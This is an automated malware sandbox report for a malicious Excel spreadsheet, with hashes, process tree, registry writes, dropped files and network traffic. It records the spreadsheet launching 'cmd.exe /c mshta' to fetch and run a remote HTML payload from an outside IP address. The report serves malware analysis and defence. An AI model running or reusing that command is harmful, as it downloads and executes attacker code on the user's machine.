| File name: | 10027860264845636552.xls |
| Full analysis: | https://app.any.run/tasks/13ecd54e-d197-41d3-aa71-b49caa5481fd |
| Verdict: | Malicious activity |
| Analysis date: | June 10, 2025, 07:24:59 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0 |
| MD5: | 0E106000B2EF3603477CB460F2FC1751 |
| SHA1: | 7C0BD61A7069CC04D4A0AB02B96D9C4003BE0F6D |
| SHA256: | 178CEAB4EA6816FB9D09C729B2A0D6A06BB786452D4178D49BD0A0DEE3F98359 |
| SSDEEP: | 1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhv:ugk3hbdlylKsgqopeJBWhZFGkE+cL2ND |
| .xls | | | Microsoft Excel sheet (78.9) |
|---|
| Author: | xXx |
|---|---|
| LastModifiedBy: | xXx |
| Software: | Microsoft Excel |
| CreateDate: | 2022:01:27 23:12:32 |
| ModifyDate: | 2022:01:28 17:08:40 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | - |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2032 | mshta http://91.240.118.172/cc/vv/fe.html | C:\Windows\System32\mshta.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 2308 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2324 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2532 | CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html | C:\Windows\System32\cmd.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3212 | mshta http://91.240.118.172/cc/vv/fe.html | C:\Windows\System32\mshta.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 4028 | CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html | C:\Windows\System32\cmd.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 3221225786 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | n |
Value: 206E200004090000010000000000000000000000 | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (2308) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2308 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR4200.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3CBC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\10027860264845636552.xls.LNK | lnk | |
MD5:0BE319F234C79171B78628C9314B1EB7 | SHA256:0FD1945D0BF5DFC3E16D28527522EA27FBDD6A4B8EB7201F9E53309EC9DE8BD5 | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:F975A906B33C3DF56F559520E020D1F1 | SHA256:1678E2F5E522A339EA564E6F0F543F186DA690F6B04778ADBCD316F460C3A447 | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF36EF3D48E583D91F.TMP | document | |
MD5:DC73BCBADC240DDDDEEDEB81DCCF22D9 | SHA256:C6421E01CEAF6C443178B86575B9353DAF53B51E2349B631AE98D9CBFEC4D425 | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF7216276B8D962D2E.TMP | gmc | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 2324 | EXCEL.EXE | C:\Users\admin\Desktop\10027860264845636552.xls | document | |
MD5:1ADF7ABA48994723FCC8CD4E77CC9072 | SHA256:12B5D32133F19FB8E58EC6CBFE5871720B74B017C4D64625864207D36F701A2F | |||
| 2324 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFE1E413385E103975.TMP | atn | |
MD5:B9BD17DE8495FD822D82B84524208354 | SHA256:6D8881AD1EF3E7ADB638991D9E0B4FFD018DCED465EC745D1F2653E0AF6B74B1 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2308 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120750 | unknown | — | — | whitelisted |
2308 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120751 | unknown | — | — | whitelisted |
2308 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120752 | unknown | — | — | whitelisted |
2324 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120750 | unknown | — | — | whitelisted |
2324 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120751 | unknown | — | — | whitelisted |
2324 | EXCEL.EXE | POST | 302 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=120752 | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2308 | EXCEL.EXE | 95.100.186.9:80 | go.microsoft.com | AKAMAI-AS | FR | whitelisted |
2308 | EXCEL.EXE | 20.83.72.98:443 | activation.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
3212 | mshta.exe | 91.240.118.172:80 | — | Chang Way Technologies Co. Limited | HK | unknown |
2324 | EXCEL.EXE | 95.100.186.9:80 | go.microsoft.com | AKAMAI-AS | FR | whitelisted |
2324 | EXCEL.EXE | 20.83.72.98:443 | activation.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2032 | mshta.exe | 91.240.118.172:80 | — | Chang Way Technologies Co. Limited | HK | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
activation.sls.microsoft.com |
| whitelisted |
dns.msftncsi.com |
| whitelisted |